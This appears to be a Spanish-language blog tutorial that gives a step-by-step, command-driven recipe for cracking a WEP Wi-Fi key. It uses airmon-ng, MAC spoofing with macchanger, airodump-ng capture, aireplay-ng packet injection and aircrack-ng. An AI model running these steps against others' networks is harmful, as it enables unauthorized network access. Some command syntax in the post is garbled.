Hola a todos!
Este artículo quizás sea muy fácil, nada novedoso, sobre
todo para los más experimentados, pero, aunque no os lo creáis aún sigue
habiendo mucho WEP por ahí…
Vamos haya, ahí bastantes distribuciones Linux para auditar
redes inalámbricas, a mi me gusta mucho Bactrack, que se encuentra en su versión
5 R2.
WEP es el acrónimo
de Wired Equivalent Privacy, en
español Privacidad Equivalente ha Cableado, es un algoritmo muy débil porque utiliza
el algoritmo de cifrado RC4.
Vamos a ver como en cinco minutos tenemos la clave de la red
fácilmente.
Lo primero que deberíamos hacer es cambiarnos, que siempre
recomiendo cuando hacemos “pruebas” es montarnos un laboratorio y para ello
recomiendo correr siempre los live-CD y S.O en una maquina virtual. Una vez que
tenemos el S.O en la maquina virtual abrimos la consola de comandos.
1º airmon-ng (para poner la tarjeta en modo monitor.)
2º Es recomendable cambiar la Mac de nuestra maquina, para ello ponemos:
Macchanger-m
00:11:22:33:44:55, por ejemplo
3º airmon-ng start
wlan0 (en el modo monitor queda renombrada la tarjeta como mon.)
4º airodump-ng mon0 (en este apartado ya vemos las redes
disponibles.)
5º (A continuación
pulsamos control + C para parar el escaneo)
6º airodump-ng mon0 --bssid
mac de la red a escanear --channel nº canal –write demo
Ejemplo: (
airodump-ng mon0 --bssid 55:66:78:12:00:45
--channel 3 --write demo
7º (Si la red a auditor no esta emitiendo datas, es decir no
esta generando tráfico de red, nunca vamos a generar suficientes datas para
conseguir la key, pues tendréis que inyectar tráfico, vamos a ello.)
Aireplay-ng el canal de la red mon0 –b mac de la red a auditor
-h station
Aireplay-ng
-3 mon0 –b 55:66:78:12:00:45 –h 33:44:55:78:00:78
8º (Si ya hemos generado suficientes datas proseguimos.)
ls
aircrack-ng demo-01.cap
Y premio! nos pondrá un mensaje de “KEY FOUND” nos dará la
clave en texto plano.
No deberíais tardar más de diez minutos.
Hasta la próxima, saludos.